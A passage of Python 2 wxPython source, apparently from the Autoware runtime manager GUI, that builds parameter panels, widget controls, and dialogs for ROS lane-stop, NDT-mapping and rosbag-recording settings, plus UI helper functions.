return gdic.get(dlg_type + '_dialog', gdic.get('dialog', 'MyDialogParam') )
class ParamPanel(wx.Panel):
def __init__(self, *args, **kwds):
self.frame = kwds.pop('frame')
self.pdic = kwds.pop('pdic')
self.gdic = kwds.pop('gdic')
self.prm = kwds.pop('prm')
wx.Panel.__init__(self, *args, **kwds)
self.gdic['param_panel'] = self
obj = self.frame.cfg_prm_to_obj( {'pdic':self.pdic, 'gdic':self.gdic, 'param':self.prm} )
(_, _, proc) = self.frame.obj_to_cmd_dic_cmd_proc(obj)
hszr = None
self.vps = []
self.tmp_msg = None
szr = wx.BoxSizer(wx.VERTICAL)
topic_szrs = (None, None)
vars = self.prm.get('vars')
if self.gdic.get('show_order'):
var_lst = lambda name, vars : [ var for var in vars if var.get('name') == name ]
vars = reduce( lambda lst, name : lst + var_lst(name, vars), self.gdic.get('show_order'), [] )
for var in vars:
name = var.get('name')
if not gdic_dialog_type_chk(self.gdic, name):
continue
gdic_v = self.get_gdic_v_and_chk_enable(name)
if gdic_v is None:
continue
bak_stk_push(gdic_v, 'func')
if gdic_v.get('func'):
continue
v = self.pdic.get(name, var.get('v'))
vp = VarPanel(self, var=var, v=v, update=self.update)
vp.setup_tooltip()
self.vps.append(vp)
gdic_v['var'] = vp
gdic_v['func'] = vp.get_v
prop = gdic_v.get('prop', 0)
border = gdic_v.get('border', 0)
flag = wx_flag_get(gdic_v.get('flags', []))
do_category = 'no_category' not in gdic_v.get('flags', [])
if do_category and self.in_msg(var):
bak = (szr, hszr)
(szr, hszr) = topic_szrs
if szr is None:
szr = static_box_sizer(self, 'topic : ' + self.prm.get('topic'))
bak[0].Add(szr, 0, wx.EXPAND | wx.ALL, 4)
targ_szr = szr
if vp.is_nl():
hszr = None if hszr else hszr
flag |= wx.EXPAND
else:
if hszr is None:
hszr = wx.BoxSizer(wx.HORIZONTAL)
szr.Add(hszr, 0, wx.EXPAND)
flag |= wx.ALIGN_CENTER_VERTICAL
targ_szr = hszr
if do_category and 'rosparam' in var:
rp_szr = static_box_sizer(self, 'rosparam : ' + var.get('rosparam'))
targ_szr.Add(rp_szr, 0, wx.EXPAND | wx.ALL, 4)
targ_szr = rp_szr
user_category = gdic_v.get('user_category')
if user_category is not None and hszr:
user_szr = static_box_sizer(self, user_category, orient=wx.HORIZONTAL)
(flgs, bdr) = gdic_v.get('user_category_add', [ [], 0 ])
targ_szr.Add(user_szr, 0, wx_flag_get(flgs), bdr)
targ_szr = hszr = user_szr
targ_szr.Add(vp, prop, flag, border)
if 'nl' in gdic_v.get('flags', []):
hszr = None
if do_category and self.in_msg(var):
topic_szrs = (szr, hszr)
(szr, hszr) = bak
if 'hline' in gdic_v.get('flags', []) and hszr is None:
szr.Add(wx.StaticLine(self, wx.ID_ANY), 0, wx.EXPAND | wx.TOP | wx.BOTTOM, 4)
if not self.in_msg(var) and var.get('rosparam'):
k = 'ext_toggle_enables'
self.gdic[ k ] = self.gdic.get(k, []) + [ vp ]
enables_set(vp, 'toggle', proc is None)
if 'disable' in gdic_v.get('flags', []):
vp.Enable(False)
if 'hide' in gdic_v.get('flags', []):
vp.Hide()
self.SetSizer(szr)
if 'no_init_update' not in self.prm.get('flags', []):
self.update()
def get_gdic_v_and_chk_enable(self, var_name):
gdic_v = dic_getset(self.gdic, var_name, {})
if 'panel' in gdic_v and dic_eval_if_str(self.frame, gdic_v, 'panel') != self.GetParent():
return None
return gdic_v
def update(self, var=None):
update_func = self.gdic.get('update_func')
if update_func:
self.gdic['update_func_arg_var'] = var
update_func(self.pdic, self.gdic, self.prm)
def detach_func(self):
for var in self.prm.get('vars'):
name = var.get('name')
if not gdic_dialog_type_chk(self.gdic, name):
continue
gdic_v = self.get_gdic_v_and_chk_enable(name)
if gdic_v is None:
continue
if 'func' in gdic_v:
bak_stk_pop(gdic_v, 'func')
vp = gdic_v.get('var')
lst_remove_once(self.gdic.get('ext_toggle_enables', []), vp)
def in_msg(self, var):
if 'topic' not in self.prm or 'msg' not in self.prm:
return False
if self.tmp_msg is None:
klass_msg = globals().get( self.prm.get('msg') )
if klass_msg is None:
return False
self.tmp_msg = klass_msg()
(obj, attr) = msg_path_to_obj_attr(self.tmp_msg, var.get('name'))
return obj and attr in obj.__slots__
class VarPanel(wx.Panel):
def __init__(self, *args, **kwds):
self.var = kwds.pop('var')
v = kwds.pop('v')
self.update = kwds.pop('update')
wx.Panel.__init__(self, *args, **kwds)
self.min = self.var.get('min')
self.max = self.var.get('max')
self.has_slider = self.min is not None and self.max is not None
self.lb = None
label = self.var.get('label', '')
self.kind = self.var.get('kind')
if self.kind == 'radio_box':
choices = self.var.get('choices', [])
style = wx.RA_SPECIFY_COLS if self.var.get('choices_style') == 'h' else wx.RA_SPECIFY_ROWS
self.obj = wx.RadioBox(self, wx.ID_ANY, label, choices=choices, majorDimension=0, style=style)
self.choices_sel_set(v)
self.Bind(wx.EVT_RADIOBOX, self.OnUpdate, self.obj)
return
if self.kind == 'menu':
choices = self.var.get('choices', [])
self.obj = wx.Choice(self, wx.ID_ANY, choices=choices)
self.choices_sel_set(v)
self.Bind(wx.EVT_CHOICE, self.OnUpdate, self.obj)
if label:
self.lb = wx.StaticText(self, wx.ID_ANY, label)
flag = wx.LEFT | wx.ALIGN_CENTER_VERTICAL
sizer_wrap((self.lb, self.obj), wx.HORIZONTAL, 0, flag, 4, self)
return
if self.kind == 'checkbox':
self.obj = wx.CheckBox(self, wx.ID_ANY, label)
self.obj.SetValue(v)
self.Bind(wx.EVT_CHECKBOX, self.OnUpdate, self.obj)
return
if self.kind == 'checkboxes':
item_n = dic_eval_if_str(self, self.var, 'item_n', 1)
self.obj = Checkboxes(self, item_n, label)
self.obj.set(v)
for box in self.obj.boxes:
self.obj.Bind(wx.EVT_CHECKBOX, self.OnUpdate, box)
return
if self.kind == 'toggle_button':
self.obj = wx.ToggleButton(self, wx.ID_ANY, label)
set_val(self.obj, v)
self.Bind(wx.EVT_TOGGLEBUTTON, self.OnUpdate, self.obj)
button_color_hdr_setup(self.obj)
return
if self.kind == 'hide':
self.Hide()
return
szr = wx.BoxSizer(wx.HORIZONTAL)
self.lb = wx.StaticText(self, wx.ID_ANY, label)
flag = wx.LEFT | wx.ALIGN_CENTER_VERTICAL
szr.Add(self.lb, 0, flag, 4)
if self.kind == 'path':
v = str(v)
v = path_expand_cmd(v)
v = os.path.expandvars(os.path.expanduser(v))
style = wx.TE_PROCESS_ENTER + wx_flag_get( self.var.get('str_flags', []) )
self.tc = wx.TextCtrl(self, wx.ID_ANY, str(v), style=style)
self.Bind(wx.EVT_TEXT_ENTER, self.OnUpdate, self.tc)
if self.kind in ('num', None):
if self.has_slider:
self.w = self.max - self.min
vlst = [ v, self.min, self.max, self.var['v'] ]
self.is_float = len( [ v_ for v_ in vlst if type(v_) is not int ] ) > 0
self.int_max = 1000 if self.is_float else self.max
self.int_min = 0 if self.is_float else self.min
self.slider = wx.Slider(self, wx.ID_ANY, self.get_int_v(), self.int_min, self.int_max)
self.Bind(wx.EVT_COMMAND_SCROLL, self.OnScroll, self.slider)
self.slider.SetMinSize((82, 27))
szr.Add(self.slider, 1, wx.LEFT | wx.RIGHT | wx.ALIGN_CENTER_VERTICAL, 4)
else:
self.is_float = type(self.var['v']) is not int
self.tc.SetMinSize((40,27))
flag = wx.ALIGN_CENTER_VERTICAL
prop = 1 if self.kind == 'path' or self.kind == 'str' else 0
szr.Add(self.tc, prop, flag, 4)
if self.kind == 'path':
self.ref = wx.Button(self, wx.ID_ANY, 'Ref')
self.Bind(wx.EVT_BUTTON, self.OnRef, self.ref)
button_color_hdr_setup(self.ref)
self.ref.SetMinSize((40,29))
szr.Add(self.ref, 0, flag, 4)
if self.has_slider or self.kind == 'num':
vszr = wx.BoxSizer(wx.VERTICAL)
vszr.Add( self.create_bmbtn("inc.png", self.OnIncBtn) )
vszr.Add( self.create_bmbtn("dec.png", self.OnDecBtn) )
szr.Add(vszr, 0, wx.ALIGN_CENTER_VERTICAL)
self.SetSizer(szr)
def setup_tooltip(self):
if get_tooltips(self.var):
set_tooltips(self.obj, self.var)
if get_tooltip(self.var):
obj = self.lb if self.lb else (self if self.kind == 'radio_box' else self.obj)
set_tooltip(obj, self.var)
def create_bmbtn(self, filename, hdr):
dir = rtmgr_src_dir()
bm = wx.Bitmap(dir + filename, wx.BITMAP_TYPE_ANY)
style = wx.BORDER_NONE | wx.BU_EXACTFIT
obj = wx.lib.buttons.GenBitmapButton(self, wx.ID_ANY, bm, style=style)
self.Bind(wx.EVT_BUTTON, hdr, obj)
return obj
def get_v(self):
if self.kind in [ 'radio_box', 'menu' ]:
return self.choices_sel_get()
if self.kind in [ 'checkbox', 'toggle_button' ]:
return self.obj.GetValue()
if self.kind == 'checkboxes':
return self.obj.get()
if self.kind == 'hide':
return self.var.get('v')
if self.kind in [ 'path', 'str' ]:
return str(self.tc.GetValue())
if not self.has_slider and self.tc.GetValue() == '':
return ''
return self.get_tc_v()
def get_tc_v(self):
s = self.tc.GetValue()
v = str_to_float(s) if self.is_float else int(s)
if self.has_slider:
v = self.min if v < self.min else v
v = self.max if v > self.max else v
self.tc.SetValue(adjust_num_str(str(v)))
return v
def get_int_v(self):
v = self.get_tc_v()
if self.is_float:
v = int( self.int_max * (v - self.min) / self.w if self.w != 0 else 0 )
return v
def OnScroll(self, event):
iv = self.slider.GetValue()
s = str(iv)
if self.is_float:
v = self.min + float(self.w) * iv / self.int_max
s = str(Decimal(v).quantize(Decimal(str(self.get_step()))))
self.tc.SetValue(s)
self.update(self.var)
def OnIncBtn(self, event):
step = self.get_step()
self.add_v(step)
def OnDecBtn(self, event):
step = self.get_step()
self.add_v(-step)
def get_step(self):
step = self.var.get('step')
return step if step else 0.01 if self.is_float else 1
def add_v(self, step):
ov = self.get_v()
self.tc.SetValue(str(ov + step))
v = self.get_v()
if v != ov:
if self.has_slider:
self.slider.SetValue(self.get_int_v())
self.update(self.var)
def OnUpdate(self, event):
if self.has_slider:
self.slider.SetValue(self.get_int_v())
self.update(self.var)
def OnRef(self, event):
if file_dialog(self, self.tc, self.var) == wx.ID_OK:
self.update(self.var)
def choices_sel_get(self):
return self.obj.GetStringSelection() if self.var.get('choices_type') == 'str' else self.obj.GetSelection()
def choices_sel_set(self, v):
if self.var.get('choices_type') == 'str':
self.obj.SetStringSelection(v)
else:
self.obj.SetSelection(v)
def is_nl(self):
return self.has_slider or self.kind in [ 'path' ]
class MyDialogParam(rtmgr.MyDialogParam):
def __init__(self, *args, **kwds):
pdic = kwds.pop('pdic')
self.pdic_bak = pdic.copy()
gdic = kwds.pop('gdic')
prm = kwds.pop('prm')
rtmgr.MyDialogParam.__init__(self, *args, **kwds)
set_size_gdic(self, gdic)
self.Bind(wx.EVT_CLOSE, self.OnClose)
ok_lb_key = 'open_dialog_ok_label'
if dic_list_get(gdic, 'dialog_type', 'config') == 'open' and ok_lb_key in gdic:
self.button_1.SetLabel( gdic.get(ok_lb_key) )
parent = self.panel_v
frame = self.GetParent()
self.panel = ParamPanel(parent, frame=frame, pdic=pdic, gdic=gdic, prm=prm)
szr = sizer_wrap((self.panel,), wx.VERTICAL, 1, wx.EXPAND, 0, parent)
self.SetTitle(prm.get('name', ''))
(w,h) = self.GetSize()
(w2,_) = szr.GetMinSize()
w2 += 20
if w2 > w:
self.SetSize((w2,h))
def OnOk(self, event):
self.panel.update()
self.panel.detach_func()
self.EndModal(0)
def OnCancel(self, event):
self.panel.pdic.update(self.pdic_bak) # restore
self.panel.detach_func()
self.panel.update()
self.EndModal(-1)
def OnClose(self, event):
self.OnCancel(event)
class MyDialogDpm(rtmgr.MyDialogDpm):
def __init__(self, *args, **kwds):
pdic = kwds.pop('pdic')
self.pdic_bak = pdic.copy()
gdic = kwds.pop('gdic')
prm = kwds.pop('prm')
rtmgr.MyDialogDpm.__init__(self, *args, **kwds)
set_size_gdic(self, gdic)
self.Bind(wx.EVT_CLOSE, self.OnClose)
parent = self.panel_v
frame = self.GetParent()
self.frame = frame
self.panel = ParamPanel(parent, frame=frame, pdic=pdic, gdic=gdic, prm=prm)
szr = sizer_wrap((self.panel,), wx.VERTICAL, 1, wx.EXPAND, 0, parent)
self.SetTitle(prm.get('name', ''))
(w,h) = self.GetSize()
(w2,_) = szr.GetMinSize()
w2 += 20
if w2 > w:
self.SetSize((w2,h))
fix_link_color(self.hyperlink_car)
fix_link_color(self.hyperlink_pedestrian)
def OnOk(self, event):
self.panel.update()
self.panel.detach_func()
self.EndModal(0)
def OnLink(self, event):
obj = event.GetEventObject()
dic = { self.hyperlink_car : self.frame.button_car_dpm,
self.hyperlink_pedestrian : self.frame.button_pedestrian_dpm }
obj = dic.get(obj)
if obj:
self.frame.OnHyperlinked_obj(obj)
def OnCancel(self, event):
self.panel.pdic.update(self.pdic_bak) # restore
self.panel.detach_func()
self.panel.update()
self.EndModal(-1)
def OnClose(self, event):
self.OnCancel(event)
class MyDialogCarPedestrian(rtmgr.MyDialogCarPedestrian):
def __init__(self, *args, **kwds):
pdic = kwds.pop('pdic')
self.gdic = kwds.pop('gdic')
prm = kwds.pop('prm')
rtmgr.MyDialogCarPedestrian.__init__(self, *args, **kwds)
set_size_gdic(self)
self.Bind(wx.EVT_CLOSE, self.OnClose)
frame = self.GetParent()
self.frame = frame
self.SetTitle(prm.get('name', ''))
fix_link_color(self.hyperlink_car)
fix_link_color(self.hyperlink_pedestrian)
def OnLink(self, event):
obj = event.GetEventObject()
car_ped = { self.hyperlink_car : 'car', self.hyperlink_pedestrian : 'pedestrian' }.get(obj, 'car')
obj_key = self.gdic.get('car_pedestrian_obj_key', {}).get(car_ped)
obj = getattr(self.frame, 'button_' + obj_key, None) if obj_key else None
if obj:
self.frame.OnHyperlinked_obj(obj)
self.EndModal(0)
def OnClose(self, event):
self.EndModal(-1)
class MyDialogLaneStop(rtmgr.MyDialogLaneStop):
def __init__(self, *args, **kwds):
self.pdic = kwds.pop('pdic')
self.gdic = kwds.pop('gdic')
self.prm = kwds.pop('prm')
rtmgr.MyDialogLaneStop.__init__(self, *args, **kwds)
set_size_gdic(self)
self.frame = self.GetParent()
name = 'lane_stop'
var = next( ( var for var in self.prm.get('vars', []) if var.get('name') == name ), {} )
v = self.pdic.get( name, var.get('v', False) )
set_val(self.checkbox_lane_stop, v)
def update(self):
update_func = self.gdic.get('update_func')
if update_func:
update_func(self.pdic, self.gdic, self.prm)
def OnTrafficRedLight(self, event):
self.pdic['traffic_light'] = 0
self.update()
def OnTrafficGreenLight(self, event):
self.pdic['traffic_light'] = 1
self.update()
def OnTrafficLightRecognition(self, event):
pub = rospy.Publisher('/config/lane_stop', ConfigLaneStop, latch=True, queue_size=10)
msg = ConfigLaneStop()
v = event.GetEventObject().GetValue()
self.pdic['lane_stop'] = v
msg.manual_detection = not v
pub.publish(msg)
def OnOk(self, event):
self.EndModal(0)
def OnCancel(self, event):
self.EndModal(-1)
class MyDialogNdtMapping(rtmgr.MyDialogNdtMapping):
def __init__(self, *args, **kwds):
self.pdic = kwds.pop('pdic')
self.pdic_bak = self.pdic.copy()
self.gdic = kwds.pop('gdic')
self.prm = kwds.pop('prm')
rtmgr.MyDialogNdtMapping.__init__(self, *args, **kwds)
set_size_gdic(self)
parent = self.panel_v
frame = self.GetParent()
self.panel = ParamPanel(parent, frame=frame, pdic=self.pdic, gdic=self.gdic, prm=self.prm)
sizer_wrap((self.panel,), wx.VERTICAL, 1, wx.EXPAND, 0, parent)
self.update_filename()
self.klass_msg = ConfigNdtMappingOutput
self.pub = rospy.Publisher('/config/ndt_mapping_output', self.klass_msg, queue_size=10)
def update_filename(self):
tc = self.text_ctrl_path
path = tc.GetValue()
(dn, fn) = os.path.split(path)
now = datetime.datetime.now()
fn = 'autoware-%02d%02d%02d.pcd' % (
now.year % 100, now.month, now.day)
path = os.path.join(dn, fn)
set_path(tc, path)
def OnRef(self, event):
tc = self.text_ctrl_path
file_dialog(self, tc, { 'path_type' : 'save' } )
def OnRadio(self, event):
v = self.radio_btn_filter_resolution.GetValue()
tc = self.text_ctrl_filter_resolution
tc.Enable(v)
def OnPcdOutput(self, event):
tc = self.text_ctrl_filter_resolution
v = tc.GetValue() if self.radio_btn_filter_resolution.GetValue() else '0.0'
msg = self.klass_msg()
msg.filename = self.text_ctrl_path.GetValue()
msg.filter_res = str_to_float(v)
self.pub.publish(msg)
def OnOk(self, event):
self.panel.detach_func()
self.EndModal(0)
class InfoBarLabel(wx.BoxSizer):
def __init__(self, parent, btm_txt=None, lmt_bar_prg=90, bar_orient=wx.VERTICAL):
wx.BoxSizer.__init__(self, orient=wx.VERTICAL)
self.lb = wx.StaticText(parent, wx.ID_ANY, '')
self.bar = BarLabel(parent, hv=bar_orient, show_lb=False)
bt = wx.StaticText(parent, wx.ID_ANY, btm_txt) if btm_txt else None
self.Add(self.lb, 0, wx.ALIGN_CENTER_HORIZONTAL, 0)
if bar_orient == wx.VERTICAL:
sz = self.bar.GetSize()
sz.SetWidth(20)
self.bar.SetMinSize(sz)
self.Add(self.bar, 1, wx.ALIGN_CENTER_HORIZONTAL, 0)
if bt:
self.Add(bt, 0, wx.ALIGN_CENTER_HORIZONTAL, 0)
else:
szr = wx.BoxSizer(wx.HORIZONTAL)
if bt:
szr.Add(bt, 0, 0, 0)
szr.Add(self.bar, 1, 0, 0)
self.Add(szr, 1, wx.EXPAND, 0)
self.lmt_bar_prg = lmt_bar_prg
def lb_set(self, txt, col):
self.lb.SetForegroundColour(col)
self.lb.SetLabel(txt);
self.Layout()
def bar_set(self, prg):
(col1, col2) = (wx.Colour(0,0,250), wx.Colour(0,0,128))
if prg >= self.lmt_bar_prg:
(col1, col2) = (wx.Colour(250,0,0), wx.Colour(128,0,0))
self.bar.set_col(col1, col2)
self.bar.set(prg)
class Checkboxes(wx.Panel):
def __init__(self, parent, item_n, lb):
wx.Panel.__init__(self, parent, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize)
self.boxes = [ wx.CheckBox(self, wx.ID_ANY, lb + str(i)) for i in range(item_n) ]
vsz = wx.BoxSizer(wx.VERTICAL)
for j in range((item_n + 7) / 8):
hsz = wx.BoxSizer(wx.HORIZONTAL)
for i in range(8):
idx = j * 8 + i
if idx < len(self.boxes):
hsz.Add(self.boxes[idx], 0, wx.LEFT, 8)
vsz.Add(hsz)
self.SetSizer(vsz)
vsz.Fit(self)
def set(self, vs):
vs = vs if vs else [ True for box in self.boxes ]
for (box, v) in zip(self.boxes, vs):
box.SetValue(v)
def get(self):
return [ box.GetValue() for box in self.boxes ]
class BarLabel(wx.Panel):
def __init__(self, parent, txt='', pos=wx.DefaultPosition, size=wx.DefaultSize, style=0, hv=wx.HORIZONTAL, show_lb=True):
wx.Panel.__init__(self, parent, wx.ID_ANY, pos, size)
self.lb = wx.StaticText(self, wx.ID_ANY, '', style=style)
self.txt = txt
self.hv = hv
self.dir = wx.SOUTH if hv == wx.HORIZONTAL else wx.EAST
self.show_lb = show_lb
self.prg = -1
self.dflt_col1 = wx.Colour(250,250,250)
self.dflt_col2 = wx.Colour(128,128,128)
self.col1 = self.dflt_col1
self.col2 = self.dflt_col2
self.Bind(wx.EVT_PAINT, self.OnPaint)
def set(self, prg):
self.prg = prg
if self.show_lb:
self.lb.SetLabel(self.txt + str(prg) + '%' if prg >= 0 else '')
self.Refresh()
def set_col(self, col1, col2):
self.col1 = col1 if col1 != wx.NullColour else self.dflt_col1
self.col2 = col2 if col2 != wx.NullColour else self.dflt_col2
def clear(self):
self.set(-1)
def OnPaint(self, event):
dc = wx.PaintDC(self)
(w,h) = self.GetSize()
if self.IsEnabled():
p = (w if self.hv == wx.HORIZONTAL else h) * self.prg / 100
rect = wx.Rect(0, 0, p, h) if self.hv == wx.HORIZONTAL else wx.Rect(0, h-p, w, p)
dc.GradientFillLinear(rect, self.col1, self.col2, self.dir)
rect = wx.Rect(p, 0, w-p, h) if self.hv == wx.HORIZONTAL else wx.Rect(0, 0, w, h-p)
dc.GradientFillLinear(rect, wx.Colour(200,200,200), wx.Colour(220,220,220), self.dir)
else:
rect = wx.Rect(0, 0, w, h)
dc.GradientFillLinear(rect, wx.Colour(250,250,250), wx.Colour(250,250,250), self.dir)
class ColorLabel(wx.Panel):
def __init__(self, parent, lst=[], pos=wx.DefaultPosition, size=wx.DefaultSize, style=0):
wx.Panel.__init__(self, parent, wx.ID_ANY, pos, size)
self.lst = lst
self.Bind(wx.EVT_PAINT, self.OnPaint)
def set(self, lst):
self.lst = lst
self.Refresh()
def OnPaint(self, event):
dc = wx.PaintDC(self)
dc.Clear()
#change_font_point_by_rate(dc, 0.75)
(x,y) = (0,0)
(_, h, _, _) = dc.GetFullTextExtent(' ')
for v in self.lst:
if type(v) is tuple and len(v) == 2:
(x,y) = v
elif type(v) is tuple and len(v) == 3:
dc.SetTextForeground(v)
elif v == '\n':
(x,y) = (0,y+h)
elif type(v) is str:
dc.DrawText(v, x, y)
(w, _, _, _) = dc.GetFullTextExtent(v)
x += w
class StrValObj:
def __init__(self, s, v):
self.s = s
self.v = v
def GetValue(self):
return self.v
def SetValue(self, v):
self.v = v
class MyApp(wx.App):
def OnInit(self):
wx.InitAllImageHandlers()
frame_1 = MyFrame(None, wx.ID_ANY, "")
self.SetTopWindow(frame_1)
buttons_color_hdr_setup(frame_1)
frame_1.Show()
return 1
class MyDialogRosbagRecord(rtmgr.MyDialogRosbagRecord):
def __init__(self, *args, **kwds):
self.cmd_dic = kwds.pop('cmd_dic')
rtmgr.MyDialogRosbagRecord.__init__(self, *args, **kwds)
self.cbs = []
self.refresh()
self.parent = self.GetParent()
self.cmd_dic[ self.button_start ] = ('rosbag record', None)
self.toggles = [ self.button_start, self.button_stop ]
def OnRef(self, event):
tc = self.text_ctrl
file_dialog(self, tc, { 'path_type' : 'save' } )
def OnStart(self, event):
key_obj = self.button_start
path = self.text_ctrl.GetValue()
if path == '':
print('path=""')
return
topic_opt = []
if self.cbs[0].GetValue(): # 'All'
topic_opt = [ '-a' ]
else:
for obj in self.cbs:
if obj.GetValue():
topic_opt += [ obj.GetLabel() ]
if topic_opt == []:
print('topic=[]')
return
args = topic_opt + [ '-O', path ]
split_arg = [ '--split' ] if self.checkbox_split.GetValue() else []
size_arg = self.size_arg_get()
if split_arg and not size_arg:
wx.MessageBox('size is required, with split')
return
args += split_arg + size_arg
(cmd, proc) = self.cmd_dic[ key_obj ]
proc = self.parent.launch_kill(True, cmd, proc, add_args=args, obj=key_obj, kill_children=True)
self.cmd_dic[ key_obj ] = (cmd, proc)
self.parent.toggle_enables(self.toggles)
def OnStop(self, event):
key_obj = self.button_start
(cmd, proc) = self.cmd_dic[ key_obj ]
proc = self.parent.launch_kill(False, cmd, proc, sigint=True, obj=key_obj, kill_children=True)
self.cmd_dic[ key_obj ] = (cmd, proc)
self.parent.toggle_enables(self.toggles)
self.Hide()
def OnRefresh(self, event):
self.refresh()
def refresh(self):
lst = [ 'all' ] + subprocess.check_output([ 'rostopic', 'list' ]).strip().split('\n')
panel = self.panel_1
szr = self.sizer_topic
for obj in self.cbs:
szr.Remove(obj)
obj.Destroy()
self.cbs = []
for topic in lst:
obj = wx.CheckBox(panel, wx.ID_ANY, topic)
bdr = 4 if topic == 'All' else 4 * 4
szr.Add(obj, 0, wx.LEFT, bdr)
self.cbs.append(obj)
szr.Layout()
panel.SetVirtualSize(szr.GetMinSize())
self.update_filename()
def update_filename(self):
tc = self.text_ctrl
path = tc.GetValue()
(dn, fn) = os.path.split(path)
now = datetime.datetime.now()
fn = 'autoware-%04d%02d%02d%02d%02d%02d.rosbag' % (
now.year, now.month, now.day, now.hour, now.minute, now.second)
path = os.path.join(dn, fn)
set_path(tc, path)
def size_arg_get(self):
tc = self.text_ctrl_size
s = tc.GetValue()
mb = 0
try:
mb = str_to_float(s)
except ValueError:
mb = 0
if mb <= 0:
tc.SetValue('')
return [ '--size=' + str(int(mb * 1024 * 1024)) ] if mb > 0 else []
def set_size_gdic(dlg, gdic={}):
(w, h) = dlg.GetSize()
if not gdic:
gdic = getattr(dlg, 'gdic', {})
nw = gdic.get('dialog_width', w)
nh = gdic.get('dialog_height', h)
if (w, h) != (nw, nh):
dlg.SetSize((nw, nh))
def file_dialog(parent, tc, path_inf_dic={}):
path = tc.GetValue()
path = get_top(path.split(','), path)
(dn, fn) = os.path.split(path)
path_type = path_inf_dic.get('path_type')
if path_type == 'dir':
fns = path_inf_dic.get('filenames')
if type(fns) is str and fns[-5:] == '.yaml':
fns = load_yaml(fns)
if type(fns) is not list:
fns = None
path_inf_dic['filenames'] = fns
dlg = wx.DirDialog(parent, defaultPath=path)
else:
st_dic = { 'save' : wx.FD_SAVE, 'multi' : wx.FD_MULTIPLE }
dlg = wx.FileDialog(parent, defaultDir=dn, defaultFile=fn,
style=st_dic.get(path_type, wx.FD_DEFAULT_STYLE))
ret = show_modal(dlg)
if ret == wx.ID_OK:
path = ','.join(dlg.GetPaths()) if path_type == 'multi' else dlg.GetPath()
if path_type == 'dir' and fns:
path = ','.join([ path + '/' + fn for fn in fns ])
set_path(tc, path)
dlg.Destroy()
return ret
def button_color_change(btn, v=None):
if v is None and type(btn) is wx.ToggleButton:
v = btn.GetValue()
key = ( v , btn.IsEnabled() )
dic = { (True,True):('#F9F9F8','#8B8BB9'), (True,False):('#F9F9F8','#E0E0F0') }
(fcol, bcol) = dic.get(key, (wx.NullColour, wx.NullColour))
btn.SetForegroundColour(fcol)
btn.SetBackgroundColour(bcol)
def OnButtonColorHdr(event):
btn = event.GetEventObject()
dic = { wx.EVT_TOGGLEBUTTON.typeId : None,
wx.EVT_LEFT_DOWN.typeId : True,
wx.EVT_LEFT_UP.typeId : False }
v = dic.get(event.GetEventType(), '?')
if v != '?':
button_color_change(btn, v)
event.Skip()
btn_null_bgcol = None
def is_btn_null_bgcol(btn):
global btn_null_bgcol
bak = btn.GetBackgroundColour()
if btn_null_bgcol is None:
btn.SetBackgroundColour(wx.NullColour)
btn_null_bgcol = btn.GetBackgroundColour()
if bak != btn_null_bgcol:
btn.SetBackgroundColour(bak)
return bak == btn_null_bgcol
def button_color_hdr_setup(btn):
hdr = OnButtonColorHdr
if type(btn) is wx.ToggleButton:
btn.Bind(wx.EVT_TOGGLEBUTTON, hdr)
elif type(btn) is wx.Button and is_btn_null_bgcol(btn):
btn.Bind(wx.EVT_LEFT_DOWN, hdr)
btn.Bind(wx.EVT_LEFT_UP, hdr)
def buttons_color_hdr_setup(frm_obj):
key = 'button_'
btns = [ getattr(frm_obj, nm) for nm in dir(frm_obj) if nm[:len(key)] == key ]
for btn in btns:
button_color_hdr_setup(btn)
def show_modal(dlg):
buttons_color_hdr_setup(dlg)
return dlg.ShowModal()
def load_yaml(filename, def_ret=None):
dir = rtmgr_src_dir()
path = dir + filename
if not os.path.isfile(path):
return def_ret
print('loading ' + filename)
f = open(dir + filename, 'r')
d = yaml.load(f)
f.close()
return d
def terminate_children(proc, sigint=False):
for child in psutil.Process(proc.pid).get_children():
terminate_children(child, sigint)
terminate(child, sigint)
def terminate(proc, sigint=False):
if sigint:
proc.send_signal(signal.SIGINT)
else:
proc.terminate()
def th_start(target, kwargs={}):
ev = threading.Event()
kwargs['ev'] = ev
th = threading.Thread(target=target, kwargs=kwargs)
th.daemon = True
th.start()
return (th, ev)
def th_end((th, ev)):
ev.set()
th.join()
def que_clear(que):
with que.mutex:
que.queue.clear()
def append_tc_limit(tc, s, rm_chars=0):
if rm_chars > 0:
tc.Remove(0, rm_chars)
tc.AppendText(s)
def cut_esc(s):
while True:
i = s.find(chr(27))
if i < 0:
break
j = s.find('m', i)
if j < 0:
break
s = s[:i] + s[j+1:]
return s
def change_font_point_by_rate(obj, rate=1.0):
font = obj.GetFont()
pt = font.GetPointSize()
pt = int(pt * rate)
font.SetPointSize(pt)
obj.SetFont(font)
def fix_link_color(obj):
t = type(obj)
if t is CT.GenericTreeItem or t is CT.CustomTreeCtrl:
obj.SetHyperTextVisitedColour(obj.GetHyperTextNewColour())
elif t is wx.HyperlinkCtrl:
obj.SetVisitedColour(obj.GetNormalColour())
def get_tooltip(dic):
return dic.get('desc')
def get_tooltips(dic):
return dic.get('descs', [])
def set_tooltip(obj, dic):
set_tooltip_str(obj, get_tooltip(dic))
def set_tooltip_str(obj, s):
if s and getattr(obj, 'SetToolTipString', None):
obj.SetToolTipString(s)
def set_tooltips(obj, dic):
lst = get_tooltips(dic)
if lst and getattr(obj, 'SetItemToolTip', None):
for (ix, s) in enumerate(lst):
obj.SetItemToolTip(ix, s)
def get_tooltip_obj(obj):
if getattr(obj, 'GetToolTip', None):
t = obj.GetToolTip()
return t.GetTip() if t else None
return None
def scaled_bitmap(bm, scale):
(w, h) = bm.GetSize()
img = wx.ImageFromBitmap(bm)
img = img.Scale(w * scale, h * scale, wx.IMAGE_QUALITY_HIGH)
return wx.BitmapFromImage(img)
def sizer_wrap(add_objs, orient=wx.VERTICAL, prop=0, flag=0, border=0, parent=None):
szr = wx.BoxSizer(orient)
for obj in add_objs:
szr.Add(obj, prop, flag, border)
if parent:
parent.SetSizer(szr)
return szr
def static_box_sizer(parent, s, orient=wx.VERTICAL):
sb = wx.StaticBox(parent, wx.ID_ANY, s)
sb.Lower()
return wx.StaticBoxSizer(sb, orient)
def wx_flag_get(flags):
dic = { 'top' : wx.TOP, 'bottom' : wx.BOTTOM, 'left' : wx.LEFT, 'right' : wx.RIGHT,
'all' : wx.ALL, 'expand' : wx.EXPAND, 'fixed_minsize' : wx.FIXED_MINSIZE,
'center_v' : wx.ALIGN_CENTER_VERTICAL, 'center_h' : wx.ALIGN_CENTER_HORIZONTAL,
'passwd' : wx.TE_PASSWORD }
lst = [ dic.get(f) for f in flags if f in dic ]
return reduce(lambda a,b : a+b, [0] + lst)
